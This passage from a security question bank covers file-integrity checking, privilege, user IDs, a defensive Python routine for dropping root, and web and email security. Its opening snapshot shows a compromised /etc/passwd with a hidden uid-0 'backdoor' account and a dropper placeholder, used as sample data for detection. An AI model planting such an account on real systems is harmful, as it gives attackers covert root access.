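                  "/etc/hosts": b"127.0.0.1 localhost\n"}
CURRENT_FILES = {"/etc/passwd": b"root:x:0:0:root:/root:/bin/bash\nbackdoor:x:0:0::/:/bin/sh\n",
                 "/etc/hosts": b"127.0.0.1 localhost\n",
                 "/tmp/.hidden": b"\x7fELF-dropper"}
```

The baseline snapshot must be taken on a known-good system and stored where the monitored host cannot rewrite it; otherwise an attacker who gains root simply re-baselines after modifying the files.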
17.What is Fault Isolation?
Fault isolation is the practice of designing systems such that when "something
bad" happens, the negative consequences are limited in scope. The typical
method of fault isolation is to create boundaries between system components,
and ensure that the effects of faults don't cross the boundaries or that they are
limited.
18. What is privilege?

In computing, privilege is defined as the delegation of authority to perform security-relevant functions on a computer system. Users who have been delegated extra levels of control are called privileged. Users who lack most privileges are defined as unprivileged, regular or normal users. The principle of least privilege says that a user or process should hold only the privileges its task requires, for only as long as it requires them.

19. Explain user id in terms of privilege.

Every process has a real user ID (the UID), an effective user ID (the EUID), a real group ID (the GID) and an effective group ID (the EGID). ...
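The real and effective ids in practice, as an added example that is not part of the original question bank: it reads the ids of the running process, classifies what the combination means (the kernel checks the effective id on each privileged operation; the real id records who started the process), and drops root permanently in the order a setuid helper or a daemon started by root should use. The target uid and gid passed to drop_privileges are assumptions, and the drop only happens when the process really is root.

```python
# Added example (not from the question bank): inspect real/effective ids, classify them,
# and drop root permanently with a check that it cannot be regained.
import os


def current_ids() -> dict:
    return {"uid": os.getuid(), "euid": os.geteuid(),
            "gid": os.getgid(), "egid": os.getegid()}


def privilege_state(uid: int, euid: int) -> str:
    """What the kernel will allow is decided by the effective id; the real id says who
    actually started the process."""
    if euid == 0 and uid == 0:
        return "root"
    if euid == 0:
        return "setuid-root"        # started by an ordinary user, running as root
    if uid != euid:
        return "setuid"             # running as another non-root user
    return "unprivileged"


def drop_privileges(uid: int, gid: int) -> dict:
    """Give up root for good and prove it.

    Order matters: supplementary groups and the gid can only be changed while still
    root, so they go first; setres* also overwrites the saved id, which is what stops
    a later seteuid(0) from succeeding.
    """
    if os.geteuid() != 0:
        return current_ids()        # nothing to drop
    os.setgroups([])
    os.setresgid(gid, gid, gid)
    os.setresuid(uid, uid, uid)
    try:
        os.seteuid(0)
    except PermissionError:
        return current_ids()        # good: root cannot be regained
    raise RuntimeError("privileges could be regained; drop did not stick")
```

A setuid-root program that only calls seteuid() to a low id keeps root in its saved uid and can switch back at any time; that is the difference between temporarily and permanently dropping privilege, and the seteuid(0) probe at the end is how to verify which one actually happened.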
20. What is web security?

Web security threats are vulnerabilities within websites and applications, or attacks launched by malicious actors. Web security threats are designed to breach an organization's security defenses, enabling hackers and cyber criminals to control systems, access data and steal valuable resources. Common web security threats include malware, ransomware, cross-site scripting (XSS), SQL injection, phishing, denial of service and many others.

What is the relationship between web security and email security?

Attackers frequently use both email and the web to breach security defenses. Email and the web are the delivery and command channels used in 99% of successful malware attacks: a phishing email carries a link, the link leads to a web page that delivers the malware, and the malware then talks to its operator over the web. Because attackers use these two vectors in combination, it makes sense for organizations to approach web and email security with an integrated solution that covers both of these business-critical information systems.